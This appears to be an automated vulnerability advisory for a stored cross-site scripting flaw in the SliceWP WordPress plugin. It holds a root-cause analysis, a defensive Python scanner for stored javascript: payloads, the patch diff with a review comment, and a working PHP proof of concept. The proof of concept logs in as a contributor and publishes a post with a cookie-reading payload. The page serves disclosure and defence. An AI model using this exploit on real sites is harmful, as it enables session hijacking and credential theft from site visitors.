Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 5, 2026

CVE-2026-6672: Affiliate Program Suite <= 1.2.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via slicewp_affiliate_url Shortcode (slicewp)

CVE ID: CVE-2026-6672
Plugin: slicewp
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 1.2.7
Patched Version: 1.2.8
Disclosed: May 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6672: This vulnerability is a stored cross-site scripting (XSS) flaw in the SliceWP Affiliates plugin for WordPress. Affected versions are up to and including 1.2.7. The flaw exists in the 'slicewp_affiliate_url' shortcode. Authenticated users with contributor-level access or higher can inject arbitrary web scripts. The CVSS score is 6.4, indicating a medium severity issue.

The root cause is insufficient input sanitization and output escaping on user-supplied attributes within the 'slicewp_affiliate_url' shortcode. The vulnerable code resides in the file /includes/users/shortcodes/functions-shortcodes.php. The function builds an affiliate URL using the 'affiliate_id' and 'url' attributes from the shortcode. The original code at line 485 returns the raw URL directly, as return ( ! is_null( $affiliate_url ) ? $affiliate_url : '' ); with no escaping before the output is sent to the browser.

An attacker with contributor-level access can create a post or page and insert the shortcode with a malicious payload in the 'url' attribute. For example, the shortcode [slicewp_affiliate_url affiliate_id="1" url="javascript:alert(1)"] would render a link with a 'javascript:' URI scheme. When a user clicks the affiliate link, the injected JavaScript executes. The attack vector is the WordPress post/page editor; no additional endpoints are required. The payload is stored in the database and executed when the page containing the shortcode is loaded or the link is clicked.

The patch in version 1.2.8 passes the affiliate URL through esc_url() before it is returned. The change is on line 485 of functions-shortcodes.php, modifying the return statement from return ( ! is_null( $affiliate_url ) ? $affiliate_url : '' ); to return ( ! is_null( $affiliate_url ) ? esc_url( $affiliate_url ) : '' );. esc_url() refuses dangerous URI schemes like 'javascript:' (returning an empty string for them) and encodes special characters, preventing script injection.

Successful exploitation allows authenticated attackers with contributor-level access to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The injected script executes when any user visits the compromised page and follows the link. This has a direct impact on site visitors and can compromise the integrity of the WordPress installation.
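The following Python script is an added example written for this page, not code from Atomic Edge or the SliceWP plugin. It models the scheme allow-list that esc_url()-style escaping enforces and uses it to hunt stored post content for slicewp_affiliate_url shortcodes whose url attribute carries a disallowed scheme, which is the check a site owner wants after upgrading to 1.2.8: the patched shortcode neutralises such payloads on render but does not remove them from the database, and each one points at a contributor account worth reviewing. The allow-list, the regular expressions, and the sample wp_posts-style rows are constructed assumptions, not WordPress's own list or real data; the scanner is deliberately strict and treats any whitespace or control character inside the scheme as an evasion attempt.

```python
import html
import re
from urllib.parse import urlsplit

# Scheme allow-list modelled on the behaviour the advisory attributes to esc_url() (a URL
# whose scheme is not listed is rejected). Simplified stand-in written for this example,
# not WordPress's own wp_allowed_protocols() list; "" covers scheme-less/relative URLs.
ALLOWED_SCHEMES = {"", "http", "https", "mailto", "tel", "ftp", "ftps"}

SHORTCODE_RE = re.compile(r"\[slicewp_affiliate_url\b([^\]]*)\]")
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))""")

def parse_attrs(raw: str) -> dict:
    """Parse shortcode attributes ("double", 'single' or bare values) into a dict."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs

def url_scheme(url: str) -> str:
    """Scheme as a browser would resolve it: HTML entities decoded, ASCII control
    characters and whitespace removed, so 'java&#09;script:' still yields 'javascript'."""
    cleaned = re.sub(r"[\x00-\x20]+", "", html.unescape(url))
    return urlsplit(cleaned).scheme.lower()

def find_unsafe_shortcodes(post_content: str) -> list:
    """(affiliate_id, url) pairs for shortcodes whose url attribute esc_url() would reject."""
    hits = []
    for m in SHORTCODE_RE.finditer(post_content):
        attrs = parse_attrs(m.group(1))
        url = attrs.get("url", "")
        if url and url_scheme(url) not in ALLOWED_SCHEMES:
            hits.append((attrs.get("affiliate_id", ""), url))
    return hits

def scan_posts(rows) -> list:
    """rows: (post_id, author, post_content) tuples; one finding dict per unsafe shortcode."""
    return [{"post_id": pid, "author": who, "affiliate_id": aid, "url": url}
            for pid, who, body in rows for aid, url in find_unsafe_shortcodes(body)]

SAMPLE_POSTS = [  # constructed wp_posts-style rows for this example, not real data
    (101, "editor", 'Join: [slicewp_affiliate_url affiliate_id="1" url="https://shop.example/landing"]'),
    (102, "contributor", '[slicewp_affiliate_url affiliate_id="1" url="javascript:alert(document.cookie)"]'),
    (103, "contributor", "[slicewp_affiliate_url affiliate_id='2' url='JaVa&#09;ScRiPt:alert(1)']"),
    (104, "author", '[slicewp_affiliate_url affiliate_id="3"] [other_shortcode url="data:text/html,x"]'),
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']} ({f['author']}): unsafe url {f['url']!r}")
```

Against the sample rows only posts 102 and 103 are reported; post 101 uses an allowed https: URL and post 104's shortcode has no url attribute at all.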

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/slicewp/includes/users/shortcodes/functions-shortcodes.php
+++ b/slicewp/includes/users/shortcodes/functions-shortcodes.php
@@ -482,6 +482,6 @@
     // Get the affiliate's URL.
     $affiliate_url = slicewp_get_affiliate_url( absint( $atts['affiliate_id'] ), $atts['url'] );

-    return ( ! is_null( $affiliate_url ) ? $affiliate_url : '' );
+    return ( ! is_null( $affiliate_url ) ? esc_url( $affiliate_url ) : '' );

 }
 No newline at end of file
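Review bot: esc_url() on the return line is the right call for the javascript: vector the advisory describes, since it returns an empty string for a URL whose scheme is not on the allowed-protocols list and encodes characters that would otherwise break out of an href attribute, but it only escapes at output. The unchanged line above still hands the raw $atts['url'] to slicewp_get_affiliate_url(), so every other caller of that helper keeps receiving the unsanitized value, and payloads already stored in posts stay in the database and are only neutralised when this shortcode renders them; consider also sanitizing the attribute before the URL is built (esc_url_raw() is the WordPress function for that) and adding a regression test asserting that [slicewp_affiliate_url affiliate_id="1" url="javascript:alert(1)"] renders as an empty string. Minor: the file still has no trailing newline, as the "No newline at end of file" marker shows.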
--- a/slicewp/index.php
+++ b/slicewp/index.php
@@ -3,7 +3,7 @@
  * Plugin Name: SliceWP
  * Plugin URI: https://slicewp.com/
  * Description: The fastest and easiest way to set up an affiliate program for your store or membership site.
- * Version: 1.2.7
+ * Version: 1.2.8
  * Author: SliceWP
  * Author URI: https://slicewp.com/
  * Text Domain: slicewp
@@ -103,7 +103,7 @@
 	public function __construct() {

 		// Defining constants.
-		define( 'SLICEWP_VERSION', 		   '1.2.7' );
+		define( 'SLICEWP_VERSION', 		   '1.2.8' );
 		define( 'SLICEWP_BASENAME',  	   plugin_basename( __FILE__ ) );
 		define( 'SLICEWP_PLUGIN_DIR', 	   plugin_dir_path( __FILE__ ) );
 		define( 'SLICEWP_PLUGIN_DIR_URL',  plugin_dir_url( __FILE__ ) );

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6672 - Affiliate Program Suite <= 1.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via slicewp_affiliate_url Shortcode

$target_url = 'http://example.com'; // Change to the target WordPress site URL
$username = 'contributor'; // Change to a valid contributor username
$password = 'password'; // Change to the user's password
$post_content = '[slicewp_affiliate_url affiliate_id="1" url="javascript:alert(document.cookie)"]';
// This shortcode will render a link that executes JavaScript when clicked.
$cookie_file = 'cookies.txt'; // Session cookies are saved here and re-sent on every later request

// Login to WordPress
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);  // store the auth cookies set by wp-login.php
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file); // and send them with the following requests
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Open the classic editor: this creates an auto-draft and returns its ID and nonce
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);

// Extract _wpnonce and the auto-draft post ID for post creation
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
preg_match('/<input type="hidden" id="post_ID" name="post_ID" value="([0-9]+)"/', $response, $matches);
$post_id = isset($matches[1]) ? $matches[1] : '';
if ($nonce === '' || $post_id === '') {
    die("Could not read the editor nonce or post ID; check the credentials and that the classic editor is available.\n");
}
$post_title = 'XSS Test Post ' . time();

// Submit the post with the vulnerable shortcode
$post_data = array(
    '_wpnonce' => $nonce,
    'action' => 'editpost',
    'post_ID' => $post_id,
    'post_title' => $post_title,
    'content' => $post_content,
    'post_status' => 'publish',
    'post_type' => 'post',
);

$post_url = $target_url . '/wp-admin/post.php';
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

echo "Post created. View it at: " . $target_url . "/?p=" . $post_id . "\n";
echo "The post contains a link that triggers XSS when clicked.\n";
curl_close($ch);
?>
